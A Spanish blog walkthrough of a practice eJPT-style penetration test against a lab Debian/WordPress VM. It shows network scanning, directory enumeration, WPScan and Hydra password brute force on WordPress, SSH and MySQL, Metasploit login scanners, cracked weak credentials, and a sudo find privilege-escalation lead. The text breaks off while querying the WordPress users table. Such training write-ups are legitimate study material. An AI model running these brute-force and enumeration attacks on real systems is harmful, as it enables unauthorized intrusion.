Curiosidades De Hackers
SIMULACIÓN EJPT

Maquina debian con wordpress


Empezamos con un escaneo de la red para encontrar equipos:

sudo nmap -sn 192.168.0.0/24
sudo arp-scan --interface eth0 --localnet

Y encontramos equipos, los apuntamos, en este caso vamos a ir a por la 192.168.0.108:


        sudo nmap -sCV -sS -PN -p- -n --min-rate 5000 192.168.0.108
        Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-19 17:25 CEST
        Nmap scan report for 192.168.0.108
        Host is up (0.00028s latency).
        Not shown: 65532 closed tcp ports (reset)
        PORT     STATE SERVICE VERSION
        22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
        | ssh-hostkey: 
        |   2048 44:1a:e9:21:1b:21:c0:c7:b4:55:54:58:45:7a:29:af (RSA)
        |   256 bf:ff:d4:d5:92:58:3e:dd:45:38:fc:3f:12:f1:44:42 (ECDSA)
        |_  256 a0:f0:d7:82:ef:dc:ef:1a:14:88:2e:31:82:b5:61:fc (ED25519)
        80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
        |_http-title: Apache2 Debian Default Page: It works
        |_http-server-header: Apache/2.4.38 (Debian)
        3306/tcp open  mysql   MySQL 5.5.5-10.3.39-MariaDB-0+deb10u1
        | mysql-info: 
        |   Protocol: 10
        |   Version: 5.5.5-10.3.39-MariaDB-0+deb10u1
        |   Thread ID: 38
        |   Capabilities flags: 63486
        |   Some Capabilities: IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, InteractiveClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, ODBCClient, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
        |   Status: Autocommit
        |   Salt: Fmqrj:";@p5U/&q+}Wz!
        |_  Auth Plugin Name: mysql_native_password
        MAC Address: 08:00:27:64:68:6A (Oracle VirtualBox virtual NIC)
        Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
        
        Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
        Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds    
    
    

Nos toca hacer un escaneo

Podemos ver varios vectores de ataque, vamos uno por uno

Empezamos por el puerto 80

Puerto 80

Encontramos una ruta por defecto la cual no tendría que estar habilitada

Ruta por defecto

Y nos puede dar información muy importante como usuarios, contraseñas, directorios, etc.

Hagamos un escaneo de directorios


        dirb http://192.168.0.108

        -----------------
        DIRB v2.22    
        By The Dark Raver
        -----------------
        
        START_TIME: Sat Aug 19 17:30:43 2023
        URL_BASE: http://192.168.0.108/
        WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
        
        -----------------
        
        GENERATED WORDS: 4612                                                          
        
        ---- Scanning URL: http://192.168.0.108/ ----
        ==> DIRECTORY: http://192.168.0.108/admin/                                                                         
        ==> DIRECTORY: http://192.168.0.108/Downloads/                                                                     
        + http://192.168.0.108/index.html (CODE:200|SIZE:10701)                                                            
        + http://192.168.0.108/phpinfo.php (CODE:200|SIZE:86447)                                                           
        + http://192.168.0.108/server-status (CODE:403|SIZE:278)                                                           
        ==> DIRECTORY: http://192.168.0.108/wordpress/                                                                     
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/ ----
        + http://192.168.0.108/admin/ChangeLog (CODE:200|SIZE:71006)                                                       
        ==> DIRECTORY: http://192.168.0.108/admin/doc/                                                                     
        ==> DIRECTORY: http://192.168.0.108/admin/examples/                                                                
        + http://192.168.0.108/admin/favicon.ico (CODE:200|SIZE:22486)                                                     
        + http://192.168.0.108/admin/index.php (CODE:200|SIZE:18391)                                                       
        ==> DIRECTORY: http://192.168.0.108/admin/js/                                                                      
        ==> DIRECTORY: http://192.168.0.108/admin/libraries/                                                               
        + http://192.168.0.108/admin/LICENSE (CODE:200|SIZE:18092)                                                         
        ==> DIRECTORY: http://192.168.0.108/admin/locale/                                                                  
        + http://192.168.0.108/admin/README (CODE:200|SIZE:1520)                                                           
        + http://192.168.0.108/admin/robots.txt (CODE:200|SIZE:26)                                                         
        ==> DIRECTORY: http://192.168.0.108/admin/setup/                                                                   
        ==> DIRECTORY: http://192.168.0.108/admin/sql/                                                                     
        ==> DIRECTORY: http://192.168.0.108/admin/templates/                                                               
        ==> DIRECTORY: http://192.168.0.108/admin/themes/                                                                  
        ==> DIRECTORY: http://192.168.0.108/admin/tmp/                                                                     
        ==> DIRECTORY: http://192.168.0.108/admin/vendor/                                                                  
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/Downloads/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/ ----
        + http://192.168.0.108/wordpress/index.php (CODE:301|SIZE:0)                                                       
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/                                                            
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/                                                          
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-includes/                                                         
        + http://192.168.0.108/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                     
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/doc/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/examples/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/js/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/libraries/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/locale/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/setup/ ----
        + http://192.168.0.108/admin/setup/index.php (CODE:200|SIZE:1002)                                                  
        ==> DIRECTORY: http://192.168.0.108/admin/setup/lib/                                                               
        ==> DIRECTORY: http://192.168.0.108/admin/setup/themes/                                                            
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/sql/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/templates/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/themes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/tmp/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/vendor/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/ ----
        + http://192.168.0.108/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                              
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/css/                                                        
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/images/                                                     
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/includes/                                                   
        + http://192.168.0.108/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                              
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/js/                                                         
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/maint/                                                      
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/network/                                                    
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/user/                                                       
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/ ----
        + http://192.168.0.108/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                            
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/plugins/                                                  
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/themes/                                                   
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/upgrade/                                                  
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/uploads/                                                  
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-includes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/setup/lib/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/setup/themes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/css/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/images/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/includes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/js/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/maint/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/network/ ----
        + http://192.168.0.108/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                      
        + http://192.168.0.108/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                      
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/user/ ----
        + http://192.168.0.108/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                         
        + http://192.168.0.108/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                         
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/plugins/ ----
        + http://192.168.0.108/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                    
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/themes/ ----
        + http://192.168.0.108/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                     
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/upgrade/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/uploads/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                       
        -----------------
        END_TIME: Sat Aug 19 17:31:23 2023
        DOWNLOADED: 46120 - FOUND: 21
    

Hemos encontrado un wordpress, wp-admin, phpmyadmin, etc.

WordPress y otros servicios

Y encontramos un panel de autenticación de WordPress.

Hagamos un escaneo rápido de WordPress con WPScan de forma automática pero muy ruidosa:


        wpscan --url http://192.168.0.108/wordpress/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:45:34 2023

 
Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] vagrant
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 19 17:46:05 2023
[+] Requests Done: 62
[+] Cached Requests: 4
[+] Data Sent: 15.437 KB
[+] Data Received: 12.844 MB
[+] Memory used: 153.324 MB
[+] Elapsed time: 00:00:31
    

Y vemos que nos ha enumerado varios usuarios.

Intentemos hacer enumeración y fuerza bruta con WPScan:


        wpscan --url http://192.168.0.108/wordpress/ --passwords /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:54:47 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] vagrant
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 4 user/s
[SUCCESS] - philip / password                                                                                       
[SUCCESS] - admin / password                                                                                        
[SUCCESS] - hugo / 987654321                                                                                        
^Cying vagrant / misty123 Time: 00:04:13 <                                > (11455 / 57377660)  0.01%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: philip, Password: password
 | Username: admin, Password: password
 | Username: hugo, Password: 987654321

[!] No WPScan API Token given, as a result vulnerability data has not been output. / 57377660)  0.01%  ETA: ??:??:??
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 19 17:59:44 2023
[+] Requests Done: 11622
[+] Cached Requests: 40
[+] Data Sent: 6.1 MB
[+] Data Received: 6.798 MB
[+] Memory used: 257.57 MB
[+] Elapsed time: 00:04:57

Scan Aborted: Canceled by User
    

Hemos encontrado algunos temas, plugins y contraseñas.

Con WhatWeb también encontramos información necesaria:


        whatweb http://192.168.0.108/wordpress
http://192.168.0.108/wordpress [301 Moved Permanently] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], 
IP[192.168.0.108], RedirectLocation[http://192.168.0.108/wordpress/], Title[301 Moved Permanently]                                                                                                          

http://192.168.0.108/wordpress/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], 
IP[192.168.0.108], MetaGenerator[Elementor 3.13.4; features: e_dom_optimization, e_optimized_assets_loading, e_optimized_css_loading, 
a11y_improvements, additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap,WordPress 6.2.2], 
Script, UncommonHeaders[link], WordPress[6.2.2]
    

Intentemos hacer fuerza bruta con Hydra:


        hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.0.108 http-post-form '/wordpress/wp-login.php:log=^USER^&pwd=^PASS^S:302'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:06:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:1/p:1009), ~64 tries per task
[DATA] attacking http-post-form://192.168.0.108:80/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:302
[80][http-post-form] host: 192.168.0.108   login: admin   password: password
[80][http-post-form] host: 192.168.0.108   login: admin   password: password

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:06:38
    

En caso de que se muestre un mensaje de «Usuario inválido,» ajusta la URL a:

'/wordpress/wp-login.php:log=^USER^&pwd=^PASS^F:usuario invalido'

Vamos a por el servicio SSH en el puerto 22:

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://192.168.0.108
        ydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
        
        Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:55:51
        [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
        [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
        [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:2/p:3), ~1 try per task
        [DATA] attacking ssh://192.168.0.108:22/
        [22][ssh] host: 192.168.0.108   login: debian   password: debian
        [22][ssh] host: 192.168.0.108   login: vagrant   password: vagrant
        1 of 1 target successfully completed, 1 valid password found
        Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:56:04

Encontramos una contraseña y conseguimos acceder al sistema SSH.

vagrant@debian10:~$ hostname -I
        192.168.0.108 
        vagrant@debian10:~$ 

También podemos intentar acceder con Metasploit:

msfconsole
                                                  




        =[ metasploit v6.3.27-dev                          ]
 + -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
 + -- --=[ 1385 payloads - 46 encoders - 11 nops           ]
 + -- --=[ 9 evasion                                       ]
 
 Metasploit tip: You can use help to view all 
 available commands
 Metasploit Documentation: https://docs.metasploit.com/
 
 
 msf6 > search ssh_login
 
 Matching Modules
 ================
 
    #  Name                                    Disclosure Date  Rank    Check  Description
    -  ----                                    ---------------  ----    -----  -----------
    0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
    1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
 
 
 Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
 
 msf6 > use 0
 msf6 auxiliary(scanner/ssh/ssh_login) > 

Luego escalamos privilegios y exploramos más usuarios, tareas cron, contraseñas y otros servicios. Buscamos mas usuarios con `cat /etc/passwd` para enumerar Buscamos tareas contrab con `crotrab -l` con privilegios de sudores

 sudo -l
Matching Defaults entries for vagrant on debian10:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vagrant may run the following commands on debian10:
    (root) NOPASSWD: /usr/bin/find

Vamos al servicio de MySQL en el puerto 3306:

mysql -u root -p -h 192.168.0.108

Intentamos acceder con contraseñas por defecto:

mysql -u root -p -h 192.168.0.108
        Enter password: 
        ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.109' (using password: NO)

Abrimos Metasploit y vemos que no podemos acceder:

msfconsole
                                                  
        # cowsay++
         ____________                                                                                                       
        < metasploit >                                                                                                      
         ------------                                                                                                       
               \   ,__,                                                                                                     
                \  (oo)____                                                                                                 
                   (__)    )\                                                                                               
                      ||--|| *                                                                                              
                                                                                                                            
        
               =[ metasploit v6.3.27-dev                          ]
        + -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
        + -- --=[ 1385 payloads - 46 encoders - 11 nops           ]
        + -- --=[ 9 evasion                                       ]
        
        Metasploit tip: Adapter names can be used for IP params 
        set LHOST eth0
        Metasploit Documentation: https://docs.metasploit.com/
        
        msf6 > search mysql_login
        
        Matching Modules
        ================
        
           #  Name                                 Disclosure Date  Rank    Check  Description
           -  ----                                 ---------------  ----    -----  -----------
           0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility
        
        
        Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
        
        msf6 > use 0
        msf6 auxiliary(scanner/mysql/mysql_login) > show options 
        
        Module options (auxiliary/scanner/mysql/mysql_login):
        
           Name              Current Setting  Required  Description
           ----              ---------------  --------  -----------
           BLANK_PASSWORDS   true             no        Try blank passwords for all users
           BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
           DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
           DB_ALL_PASS       false            no        Add all passwords in the current database to the list
           DB_ALL_USERS      false            no        Add all users in the current database to the list
           DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted
                                                        : none, user, user&realm)
           PASSWORD                           no        A specific password to authenticate with
           PASS_FILE                          no        File containing passwords, one per line
           Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
           RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-met
                                                        asploit/basics/using-metasploit.html
           RPORT             3306             yes       The target port (TCP)
           STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
           THREADS           1                yes       The number of concurrent threads (max one per host)
           USERNAME          root             no        A specific username to authenticate as
           USERPASS_FILE                      no        File containing users and passwords separated by space, one pair p
                                                        er line
           USER_AS_PASS      false            no        Try the username as the password for all users
           USER_FILE                          no        File containing usernames, one per line
           VERBOSE           true             yes       Whether to print output for all attempts
        
        
        View the full module info with the info, or info -d command.
        
        msf6 auxiliary(scanner/mysql/mysql_login) > set VERBOSE false
        VERBOSE => false
        msf6 auxiliary(scanner/mysql/mysql_login) > set rhost 192.168.0.108
        rhost => 192.168.0.108
        msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
        PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
        msf6 auxiliary(scanner/mysql/mysql_login) > run
        
        [*] 192.168.0.108:3306    - Scanned 1 of 1 hosts (100% complete)
        [*] Auxiliary module execution completed

Intentamos más exploits o usar Hydra:

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt  -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt  mysql://192.168.0.108
        Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
        
        Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 19:15:31
        [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
        [DATA] max 4 tasks per 1 server, overall 4 tasks, 169512 login tries (l:168/p:1009), ~42378 tries per task
        [DATA] attacking mysql://192.168.0.108:3306/
        [ERROR] Child with pid 64180 terminating, can not connect
        [ERROR] Child with pid 64182 terminating, can not connect
        [ERROR] Child with pid 64181 terminating, can not connect
        [ERROR] Child with pid 64183 terminating, can not connect
        [ERROR] all children were disabled due too many connection errors
        0 of 1 target completed, 0 valid password found
        Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 19:15:56

En este caso, la única forma de entrar es con las contraseñas por defecto (root:root).

Investigamos por MySQL:

mysql -u root -p -h 192.168.0.108
        Enter password: 
        Welcome to the MariaDB monitor.  Commands end with ; or \g.
        Your MariaDB connection id is 37
        Server version: 10.3.39-MariaDB-0+deb10u1 Debian 10
        
        Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
        
        Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
        
        MariaDB [(none)]> show databases;
        +--------------------+
        | Database           |
        +--------------------+
        | information_schema |
        | mysql              |
        | performance_schema |
        | wordpress          |
        +--------------------+
        4 rows in set (0,063 sec)
        
        MariaDB [(none)]> show tables;
        ERROR 1046 (3D000): No database selected
        MariaDB [(none)]> use wordpress;
        Reading table information for completion of table and column names
        You can turn off this feature to get a quicker startup with -A
        
        Database changed
        MariaDB [wordpress]> show tables;
        +-----------------------+
        | Tables_in_wordpress   |
        +-----------------------+
        | wp_commentmeta        |
        | wp_comments           |
        | wp_e_events           |
        | wp_links              |
        | wp_options            |
        | wp_postmeta           |
        | wp_posts              |
        | wp_term_relationships |
        | wp_term_taxonomy      |
        | wp_termmeta           |
        | wp_terms              |
        | wp_usermeta           |
        | wp_users              |
        +-----------------------+
        13 rows in set (0,001 sec)
        
        MariaDB [wordpress]> select * from wp_users;
        +----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
